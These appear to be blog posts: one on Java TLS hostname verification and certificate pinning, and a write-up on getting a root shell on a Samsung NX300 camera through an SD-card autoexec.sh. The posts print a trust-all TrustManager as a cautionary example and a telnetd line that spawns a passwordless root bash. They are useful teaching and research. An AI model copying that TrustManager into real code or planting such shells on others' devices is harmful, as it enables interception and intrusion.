Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.
Typos aside, this is very true advice. The article also covers other common SSL/TLS related problems like certificate chaining, self-signed certs and SNI. A must read! The fact that it does not mention the SSLCertificateSocketFactory is only a little snag.
Java 1.7+
As of Java 1.7, there is a new abstract class X509ExtendedTrustManager that finally unifies the two sides of certificate verification:
Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.
To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.
This class extends the checkServerTrusted and checkClientTrusted methods with an additional parameter for the socket reference, allowing the TrustManager to obtain the hostname that was used for the connection, thus making it possible to actually verify that hostname.
To retrofit this into the old X509TrustManager interface, all instances of X509TrustManager are internally wrapped into an AbstractTrustManagerWrapper that performs hostname verification according to the socket's SSLParameters.
All this happens transparently; all you need to do is initialize your socket with the hostname and then set the right params:
SSLParameters p = sslSocket.getSSLParameters();
p.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(p);
If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.
However, if you do run the above code, the certificate will be checked against the IP address or hostname that you are connecting to. If the service you are using employs DNS SRV, the hostname (the actual machine you are connecting to, e.g. "xmpp-042.example.com") might differ from the service name (what the user entered, like "example.com"). However, the certificate will be issued for the service name, so the verification will fail. As such protocols are most often combined with STARTTLS, you will need to wrap your SSLSocket around your plain Socket, for which you can use the following code:
sslSocket = sslContext.getSocketFactory().createSocket(
plainSocket,
serviceName, /**< set your service name here */
plainSocket.getPort(),
true);
// set the socket parameters here!
API Confusion Conclusion
To summarize the different "platforms":
- If you are on Java 1.6 or earlier, you are screwed!
- If you have Android, use SSLCertificateSocketFactory and be happy.
- If you have Apache HttpClient, add a StrictHostnameVerifier.verify() call right after you connect your socket, and check its return value!
- If you are on Java 1.7 or newer, do not forget to set the right SSLParameters, or you might still be screwed.
Java SSL In the Literature
There is a large amount of good and bad advice out there; you just need to be a security expert to separate the wheat from the chaff.
Negative Examples
The most expensive advice is free advice. And the Internet is full of it. First, there is code to let Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disable certificate validation, because all these security exceptions only get into our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still written. The suggestions are all very similar, and all pretty bad.
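For reference, the recipes in question all boil down to something like the following; it compiles, it makes the exceptions go away, and it silently turns off all certificate checks (shown here only so you can recognize and remove it):
import java.security.cert.X509Certificate;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

// The classic "fix" from the Internet: a TrustManager that accepts
// absolutely everything. Do NOT use this outside of this blog post.
TrustManager[] trustAll = new TrustManager[] {
    new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) {}
        public void checkServerTrusted(X509Certificate[] chain, String authType) {}
        public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    }
};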
Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, everybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effects can range from funny through embarrassing up to life-threatening, if you are a journalist in a crisis zone.
The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.
Fortunately, the situation on StackOverflow has been improving over the years.
Some time ago, you were overwhelmed with DO_NOT_VERIFY HostnameVerifiers and all-accepting DefaultTrustManagers, where the authors conveniently forgot to mention that their code turns the big red "security" switch to OFF.
The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.
Positive Examples
In 2012, Kevin Locke has created a proper HostnameVerifier using the internal sun.security.util.HostnameChecker class, which seems to exist in Java SE 6 and 7. This HostnameVerifier is used with AsyncHttpClient, but is suitable for other use-cases as well.
Fahl et al. have analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they did find a massive amount of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 followup, they have developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.
Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!
There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.
Mitigation Possibilities
So you are an app developer, and you get this pesky CertificateException you could not care less about. What can you do to get rid of it, in a secure way? That depends on your situation.
Cloud-Connected App: Certificate Pinning
If your app is always connecting to known-in-advance servers under you control (like only your company's "cloud"), employ Certificate Pinning.
If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with ultimate control over the whole security infrastructure, you do not need to pay certificate extortion fees to greedy CAs, and a compromised CA can not issue certificates that would allow MitM attacks against your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.
To implement the client side, you need to store the CA cert in a key file,
which you can use to create an X509TrustManager
that will only accept server
certificates signed by your CA:
// Load your CA certificate(s) from a key store file bundled with the app:
KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
// Build a TrustManager that only accepts certificates signed by these CAs:
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(ks);
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new java.security.SecureRandom());
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...
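In case you are wondering how to create that key store in the first place: a single keytool -importcert -alias ca -file ca.pem -keystore mykeystore invocation should do (pick a store type supported on your platform; stock Android wants a BouncyCastle BKS store instead of the JKS default).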
If you prefer to trust the establishment (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA in your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.
User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP
In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".
The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.
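The same scheme can be sketched for TLS in a few lines (my own illustration, not a complete solution: no user interaction, no key rotation): remember the SHA-256 fingerprint of the first certificate you see, and refuse anything else later.
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.security.cert.Certificate;
import javax.net.ssl.SSLPeerUnverifiedException;
import javax.net.ssl.SSLSocket;

// Trust On First Use for TLS (sketch): pin the server certificate's
// SHA-256 fingerprint on first contact, compare on every later contact.
public class Tofu {
    public static void check(SSLSocket socket, Path pinFile) throws Exception {
        socket.startHandshake();
        Certificate cert = socket.getSession().getPeerCertificates()[0];
        byte[] fp = MessageDigest.getInstance("SHA-256").digest(cert.getEncoded());
        if (!Files.exists(pinFile)) {
            Files.write(pinFile, fp); // first use: remember the fingerprint
        } else if (!MessageDigest.isEqual(Files.readAllBytes(pinFile), fp)) {
            throw new SSLPeerUnverifiedException(
                    "REMOTE HOST IDENTIFICATION HAS CHANGED!");
        }
    }
}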
The problem with the TOFU approach is that it does not mix well with the PKI infrastructure model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).
With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.
If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course you can create your own, self-signed, certificate with a ridiculously long expiration time, but this practice is frowned upon (for self-signing and long expiration times).
Currently, some ideas exist about how to combine PKI with TOFU, but the only sensible thing that an app can do is to give a shrug and ask the user.
Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your apps' TLS connections, that leverages the system's ability for certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination as legitimate. Internally, MTM is using a key store where it collects all the certificates that the user has permanently accepted.
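Integrating MTM then boils down to a few lines (roughly following the project's README; 'context' is your Activity or Service):
// plug the MemorizingTrustManager (de.duenndns.ssl) into a fresh SSLContext:
SSLContext sc = SSLContext.getInstance("TLS");
MemorizingTrustManager mtm = new MemorizingTrustManager(context);
sc.init(null, new X509TrustManager[] { mtm }, new java.security.SecureRandom());
// from here on, use sc.getSocketFactory() for your sockets/connections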
Browser
If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.
Outlook
DNS + TLS = DANE
Besides TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).
With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:
- (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
- (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
- (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
- (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.
Multiple constraints can be specified to tighten the checks, encoded in TLSA records (for TLS association). TLSA records are always specific to a given server name and port. For example, to make a secure XMPP connection with "zombofant.net", first the XMPP SRV record (_xmpp-client._tcp) needs to be obtained:
$ host -t SRV _xmpp-client._tcp.zombofant.net
_xmpp-client._tcp.zombofant.net has SRV record 0 0 5222 xmpp.zombofant.net.
Then, the TLSA record(s) for xmpp.zombofant.net:5222
must be obtained:
$ host -t TLSA _5222._tcp.xmpp.zombofant.net
_5222._tcp.xmpp.zombofant.net has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D
This record reads as: the server is using a domain issued certificate (3), with the full certificate (0) represented via its SHA-256 hash (1): 75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D.
And indeed, if we check the server certificate using openssl s_client, the SHA-256 hash does match:
Subject: CN=zombofant.net
Issuer: O=Root CA, OU=http://www.cacert.org, CN=CA Cert Signing Authority/emailAddress=support@cacert.org
Validity
Not Before: Apr 8 07:25:35 2014 GMT
Not After : Oct 5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D
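The client-side check for this record type is pleasantly boring: once you have the peer's certificate from the TLS handshake, it is a single hash comparison (a sketch; obtaining and DNSSEC-validating the TLSA record is the actual hard part):
import java.security.MessageDigest;
import java.security.cert.X509Certificate;

// TLSA selector 0 (full certificate), matching type 1 (SHA-256):
// compare the record data against the hash of the presented certificate.
public static boolean matchesTlsa(X509Certificate cert, byte[] tlsaData)
        throws Exception {
    byte[] hash = MessageDigest.getInstance("SHA-256").digest(cert.getEncoded());
    return MessageDigest.isEqual(hash, tlsaData);
}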
Of course, this information can only be relied upon if the DNS records are secured by DNSSEC. And DNSSEC can be abused by the same entities that already can manipulate Root CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of attack is made significantly harder: while a typical Root CA list contains hundreds of entries, with an unknown number of intermediate CAs each, and it is sufficient to compromise any one of them to screw you, with DNSSEC the attacker needs to obtain the keys to your domain (zombofant.net), to your top-level domain (.net) or the master root keys (.). In addition to that improvement, another benefit of DANE is that server operators can replace (paid) Root CA services with (cheaper/free) DNS records.
However, there is a long way to go until DANE can be used in Java. Java's own DNS code is very limited (no SRV support; TLSA - what are you dreaming of?). The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j, and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.
Conclusion
Internet security is hard. Let's go bake some cookies!
Comments on HN
This is the second post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera interacts with the outside world using NFC and WiFi. In this post, we will have a deeper look at the operating system running on the camera, execute some code and open a remote root shell. This process can be applied (with some adaptations) to different networked consumer electronics, including home routers, NAS boxes and Smart TVs. The third post will leverage that knowledge to add functionality.
Firmware: Looking for Loopholes
Experience shows that most firmware images provide an easy way to run a user-provided shell script on boot. This feature is often added by the "software engineers" during development, but it boils down to a local root backdoor. On a camera, the SD card would be a good place to search. Other devices might execute code from a USB flash drive or the built-in hard disk.
Usually, we would have to start with the firmware update file (nx300.bin from this 241MB ZIP in our case), run binwalk on it, extract and mount the root file system and have our fun. In this case, however, the source archive from Samsung's OSS Release Center contains an unpacked root file system tree in TIZEN/project/NX300/image/rootfs, so we just examine that:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l
total 72
drwxr-xr-x 4 4096 Oct 16 2013 bin/
drwxr-xr-x 3 4096 Oct 16 2013 data/
drwxr-xr-x 3 4096 Oct 16 2013 dev/
drwxr-xr-x 38 4096 Oct 16 2013 etc/
drwxr-xr-x 9 4096 Oct 16 2013 lib/
-rw-r--r-- 1 203 Oct 16 2013 make_image.log
drwxr-xr-x 8 4096 Oct 16 2013 mnt/
drwxr-xr-x 3 4096 Oct 16 2013 network/
drwxr-xr-x 16 4096 Oct 16 2013 opt/
drwxr-xr-x 2 4096 Oct 16 2013 proc/
lrwxrwxrwx 1 13 Oct 16 2013 root -> opt/home/root/
drwxr-xr-x 2 4096 Oct 16 2013 sbin/
lrwxrwxrwx 1 8 Oct 16 2013 sdcard -> /mnt/mmc
drwxr-xr-x 2 4096 Oct 16 2013 srv/
drwxr-xr-x 2 4096 Oct 16 2013 sys/
drwxr-xr-x 2 4096 Oct 16 2013 tmp/
drwxr-xr-x 16 4096 Oct 16 2013 usr/
drwxr-xr-x 13 4096 Oct 16 2013 var/
make_image.log sounds like somebody forgot to clean up before shipping (this file is actually contained on the camera):
SBS logging begin
Wed Oct 16 14:27:21 KST 2013
WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+rx; use --squash-rino-perm or --nosquash-rino-perm to suppress this warning
If we can believe the /sdcard symlink, the SD card is mounted at /mnt/mmc. Usually, there are some scripts and tools referencing the directory, and we should start with them:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .
./etc/fstab:/dev/mmcblk0 /mnt/mmc exfat noauto,user,umask=1000 0 0
./etc/fstab:/dev/mmcblk0p1 /mnt/mmc exfat noauto,user,umask=1000 0 0
./usr/sbin/pivot_rootfs_ubi.sh:umount /oldroot/mnt/mmc
./usr/sbin/rcS.pivot: mkdir -p /mnt/mmc
./usr/sbin/rcS.pivot: mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc
./usr/bin/inspkg.sh: mount -t vfat /dev/mmcblk0 /mnt/mmc
./usr/bin/inspkg.sh: mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/inspkg.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/inspkg.sh:find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
./usr/bin/ubi_initial.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ubi_initial.sh:cd /mnt/mmc
./usr/bin/remount_mmc.sh: nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage
./usr/bin/remount_mmc.sh: umount /mnt/mmc 2> /dev/null
./usr/bin/remount_mmc.sh: /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
./usr/bin/remount_mmc.sh: /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]
What we have here are some usual Linux boot-up configuration files (fstab, rcS.pivot, ubi_initial.sh), a very interesting script that installs any Debian packages from the SD card (inspkg.sh), and ~50 shared libraries and executable binaries with the /mnt/mmc string hardcoded inside.
Package Installer Script
Let us have a look at inspkg.sh first:
#! /bin/sh
echo $1
if [ "$#" = "2" ]
then
if [ "$2" = "0" ]
then
echo -e "mount mmcblk0.."
mount -t vfat /dev/mmcblk0 /mnt/mmc
else
echo -e "mount mmcblk0p1..."
mount -t vfat /dev/mmcblk0p1 /mnt/mmc
fi
else
echo -e "mount mmcblk0p1..."
mount -t vfat /dev/mmcblk0p1 /mnt/mmc
fi
find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
echo -e "sync...."
sync
This is a shell script that takes one or two arguments. The first one is the
package name to look for (the find
command will find and install all .deb
files containing the first argument in their name). The second argument is
used to mount the correct partition of the SD card. Surely we can use this
script to install dropbear,
gcc or moon-buggy. Now we only need to figure out how (or from where) this
script is run:
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r inspkg.sh .
georg@megavolt:TIZEN/project/NX300/image/rootfs$
Whoops. There are no references to it in the firmware. It was merely a red herring, and we need to find another way in.
The Magic Binary Blob
In /usr/bin, the most interesting file is di-camera-app-nx300, making references to /mnt/mmc/Demo/NX300_Demo.mp4, /mnt/mmc/SYSTEM/Device.xml and a bunch of WAV files in /mnt/mmc/sounds/ that seem to correspond to UI actions (up, down, ..., delete, ev, wifi).
This is obviously the magic binary blob controlling the really interesting functions (like the UI, the shutter, and the image processor). Most consumer electronics branded as "Open Source" contain some kind of Linux runtime which is only used to execute one large binary. That binary in turn encloses all the things you want to tinker with, but it is not provided with source code, still leaving you at the mercy of the manufacturer.
As expected, this program comes out of nowhere. There are traces of the di-camera-app-nx300 Debian package (version 0.2.387) being installed:
Package: di-camera-app-nx300
Status: install ok installed
Priority: extra
Section: misc
Installed-Size: 87188
Maintainer: Sookyoung Maeng <[snip]@samsung.com>, Jeounggon Yoo <[snip]@samsung.com>
Architecture: armel
Source: di-camera-app
Version: 0.2.387
Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (>= 2.4),
libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,
libecore-x, libedje (>= 0.9.9.060+svn20100304), libeina (>= 1.0.0.001+svn20100831),
libelm, libevas (>= 0.9.9.060+svn20100203), libgcc1 (>= 1:4.4.0),
libglib2.0-0 (>= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,
libmm-utility, libnetwork-0, libnl2 (>= 2.0), libslp-pm-0, libslp-utilx-0,
libstdc++6 (>= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,
libxrandr2 (>= 2:1.2.0), libxtst6, prefman, libproduction-mode,
libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,
libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,
sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,
di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,
diosal
Description: Digital Imaging inhouse application for nx300
So this package is created from di-camera-app, which does not exist either, except "inhouse". Thank you, Samsung, for spoiling the fun... :-(
Besides some start/stop scripts, the only other interesting reference to this magic binary blob is in TIZEN/build/exec.sh, which looks like a mixture of installation and startup script:
#!/bin/sh
#
cp -f *.so /usr/lib
cp -f di-camera-app-nx300 /usr/bin
sync
sync
sync
sleep 1
cd /
startx; di-camera-app &
(Because with only one sync, you can never know, and two might still not be enough if you must be 300% sure the data has been written.)
The camera app is accompanied by another magic binary blob for WiFi, smart-wifi-app-nx300 (Samsung should get an award for creative file names). However, there are no hints at possible code execution in either program, so we need to dig even deeper.
Searching Shared Libraries
The situation in /usr/lib is different, though. We can run strings on the files that mention the SD card mount point (limiting the output to the relevant lines):
georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do \
echo "--- $f" ; strings $f | grep /mnt/mmc; done
[snip]
--- libmisc.so
/mnt/mmc
/mnt/mmc/autoexec.sh
--- libnetwork.so
/mnt/mmc/iperf.txt
--- libstorage.so
/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e > /tmp/card_result.txt
cp /tmp/card_result.txt /mnt/mmc
/mnt/mmc/auto_run.sh
Okay, this is starting to get hot! /mnt/mmc/autoexec.sh and /mnt/mmc/auto_run.sh are exactly what we have been looking for. We need to try one of them and see what happens!
autoexec.sh
To test our theory, we need to mount the camera via USB and create the following autoexec.sh file in its root directory (Windows users watch out: the file needs to have Unix linebreaks!):
#!/bin/sh
# Collect some basic information about the running system into a log
# file on the SD card:
LOG=/mnt/mmc/autoexec.log
date >> $LOG
id >> $LOG
echo "$PATH" >> $LOG
ps axfu >> $LOG
mount >> $LOG
Now we need to unmount the camera, turn it off and on again, wait some seconds, mount it, and check if we got lucky. Let's see... autoexec.log is there! Jackpot! Now we can analyze its contents, piece by piece:
Fri May 9 06:25:20 UTC 2014
uid=0(root) gid=0(root)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:/sbin:/usr/local/bin:/usr/scripts
This output was just generated, it was running as root (yeah!), and the path looks rather boring.
PID VSZ RSS STAT COMMAND
[stripped boring kernel threads and some columns]
1 2988 52 Ss init
139 11460 1348 S /usr/bin/system_server
144 2652 188 Ss dbus-daemon --system
181 3416 772 Ss /usr/bin/power_manager
232 12268 4608 S<s+ /usr/bin/Xorg :0 -logfile /opt/var/log/Xorg.0.log -ac -noreset \
-r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d
243 2988 76 Ss init
244 2988 56 Ss init
245 2988 60 Ss+ init
246 2988 56 Ss+ init
247 2988 8 S sh /usr/etc/X11/xinitrc
256 20200 2336 S \_ /usr/bin/enlightenment -profile samsung \
-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
254 19876 8 S /usr/bin/launchpad_preloading_preinitializing_daemon
255 12648 816 S /usr/bin/ac_daemon
259 3600 8 S dbus-launch --exit-with-session /usr/bin/enlightenment -profile samsung \
-i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it
260 2652 8 Ss /usr/bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
267 690688 34760 Ssl di-camera-app-nx300
404 2988 520 S \_ sh -c /mnt/mmc/autoexec.sh
405 2988 552 S \_ /bin/sh /mnt/mmc/autoexec.sh
408 2860 996 R \_ ps axfu
Our script is executed by di-camera-app-nx300, there is enlightenment and dbus running, and i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it.
The mount point list looks pretty standard as well for an embedded device, using UBIFS for flash memory and the exfat driver for the SD card:
rootfs on / type rootfs (rw)
ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)
devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)
none on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,relatime)
tmpfs on /var/lock type tmpfs (rw,relatime)
tmpfs on /var/tmp type tmpfs (rw,relatime)
tmpfs on /var/backups type tmpfs (rw,relatime)
tmpfs on /var/cache type tmpfs (rw,relatime)
tmpfs on /var/local type tmpfs (rw,relatime)
tmpfs on /var/log type tmpfs (rw,relatime)
tmpfs on /var/mail type tmpfs (rw,relatime)
tmpfs on /var/opt type tmpfs (rw,relatime)
tmpfs on /var/spool type tmpfs (rw,relatime)
tmpfs on /opt/var/log type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,
dmask=0022,allow_utime=0020,codepage=cp437,iocharset=iso8859-1,namecase=0,errors=remount-ro)
Remote Access
The camera is not connected to your WiFi network by default; you have to launch one of the WiFi apps first. The most reliable one for experimenting in your (protected) home network is the Email app. After you launch it, the camera looks for WiFi networks (configure your own one here), and stays connected for a long time, keeping the X server (and anything you run via autoexec.sh) open.
After tinkering around with a static dropbear binary downloaded from the Internets (and binary-patching the references to dropbear_rsa_host_key and authorized_keys), I ran into a really silly problem:
[443] May 09 12:00:45 user 'root' has blank password, rejected
Running a Telnet Server
Around the same time, I realized one thing that I should have checked first:
lrwxrwxrwx 1 17 May 22 2013 /usr/sbin/telnetd -> ../../bin/busybox
Our firmware comes with busybox, and busybox comes with telnetd - an easy to deploy remote login service. After the realization settled, the first attempt looked like we almost did it:
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
Connection closed by foreign host.
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
telnet: Unable to connect to remote host: Connection refused
Wow, the telnet port was open, something was running, but we crashed it! Another two mount-edit-restart-mount cycles later, the issue was clear:
telnetd: can't find free pty
Fortunately, the solution is documented. Now we can log into the camera for sure?
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
************************************************************
* SAMSUNG LINUX PLATFORM *
************************************************************
nx300 login: root
Login incorrect
Damn, Samsung! Why no login? Maybe we can circumvent this in some way? Does the busybox telnetd help output provide any hints?
-l LOGIN Exec LOGIN on connect
Maybe we can replace the evil password-demanding login command with... a shell? Let us adapt our SD card autoexec.sh script to what we have gathered:
#!/bin/sh
# telnetd requires pseudo-terminals, which the firmware does not set up:
mkdir -p /dev/pts
mount -t devpts none /dev/pts
# spawn a root shell directly instead of the broken login binary:
telnetd -l /bin/bash -F > /mnt/mmc/telnetd.log 2>&1 &
Another mount-edit-restart cycle, and we are in:
georg@megavolt:~$ telnet nx300
Trying 192.168.0.147...
Connected to nx300.local.
Escape character is '^]'.
************************************************************
* SAMSUNG LINUX PLATFORM *
************************************************************
nx300:/# cat /proc/cpuinfo
Processor : ARMv7 Processor rev 8 (v7l)
BogoMIPS : 1395.91
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x2
CPU part : 0xc09
CPU revision : 8
Hardware : Samsung-DRIMeIV-NX300
Revision : 0000
Serial : 0000000000000000
nx300:/# free
total used free shared buffers cached
Mem: 512092 500600 11492 0 132 41700
-/+ buffers/cache: 458768 53324
Swap: 30716 8084 22632
nx300:/# df -h /
Filesystem Size Used Available Use% Mounted on
ubi0!rootdir 352.5M 290.8M 61.6M 83% /
nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/
total 1584
drwxr-xr-x 2 root root 520 May 22 2013 .
drwxr-xr-x 3 root root 232 May 22 2013 ..
-rwxr-xr-x 1 root root 394775 May 22 2013 SAM_0015.JPG
-rwxr-xr-x 1 root root 335668 May 22 2013 SAM_0016.JPG [Obama was here]
-rwxr-xr-x 1 root root 357591 May 22 2013 SAM_0017.JPG
-rwxr-xr-x 1 root root 291493 May 22 2013 SAM_0018.JPG
-rwxr-xr-x 1 root root 232470 May 22 2013 SAM_0019.JPG
nx300:/#
Congratulations, you have gained network access to yet another Linux appliance! From here, you should be able to do anything you want on the camera, except for the interesting things locked away in the Samsung binaries.
Full series:
The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.
Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.
This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.
The findings in this blog post are based on firmware version 1.31.
NFC Tag
The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
